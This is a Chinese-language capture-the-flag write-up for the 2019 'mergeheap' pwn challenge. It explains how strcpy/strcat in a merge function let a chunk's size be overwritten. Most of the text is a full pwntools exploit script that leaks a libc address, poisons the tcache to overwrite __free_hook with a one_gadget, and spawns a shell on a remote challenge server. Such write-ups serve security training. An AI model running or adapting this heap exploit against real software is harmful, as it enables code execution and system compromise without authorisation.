hwb_2019_mergeheap(str系列的特性)
作者:互联网
例行检查我就不放了
漏洞点在merge这个函数
可以看到他将俩chunk进行拼接,并且把chunk的内容复制到新的chunk里面了
但是strcpy和strcat都有着一个特性就是遇到\x00就会停止,
假设我们将0x30和0x38的chunk合并,因为\x00给我们覆盖了所以他就会把下一个chunk的size给覆盖 造成改写chunk的大小,如果改写的chunk大小包含被释放掉的chunk,我们就可以去修改fd指针造成任意写去获得shell
完整exp如下:
from pwn import *
#p = process('./mergeheap')
p = remote('node4.buuoj.cn',26286)
elf = ELF('./mergeheap')
libc = ELF('./libc-2.27.so')
def launch_gdb():
context.terminal = ['xfce4-terminal','-x','sh','-c']
gdb.attach(proc.pidof(p)[0])
def ls(index):
p.sendlineafter('>>',str(index))
def add(size,content):
ls(1)
p.sendlineafter('len:',str(size))
p.sendafter('content:',content)
def show(index):
ls(2)
p.sendlineafter('idx:',str(index))
def free(index):
ls(3)
p.sendlineafter('idx:',str(index))
def merge(idx1,idx2):
ls(4)
p.sendlineafter('idx1:',str(idx1))
p.sendlineafter('idx2:',str(idx2))
#launch_gdb()
for i in range (8):
add(0x80,'aaaa\n')
for i in range (1,8):
free(i)
free(0)
add(8,'aaaaaaaa')
show(0)
p.recvuntil('a'*8)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-0x3ebd20
print('libc_base--->'+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
print('free_hook--->'+hex(free_hook))
one = [0x4f2c5,0x4f322,0x10a38c]
one_gadget = libc_base + one[1]
add(0x60,'aaaa\n')#1
add(0x30,'a'*0x30)#2
add(0x38,'a'*0x38)#3
add(0x100,'c\n')#4
add(0x68,'d\n')#5
add(0x20,'c\n')#6
add(0x20,'e\n')#7
add(0x20,'f\n')#8
add(0x20,'g\n')#9
free(5)
free(7)
free(8)
merge(2,3)
free(6)
payload = b'a'*0x28+p64(0x31)+p64(free_hook)+p64(0)+b'\n'
add(0x100,payload)
add(0x20,'aaaa\n')
add(0x20,'aaaa\n')
add(0x20,p64(one_gadget)+b'\n')
free(9)
p.interactive()
结束!!!
标签:mergeheap,libc,chunk,hwb,free,add,2019,str,0x20 来源: https://www.cnblogs.com/zhuangzhouQAQ/p/15968717.html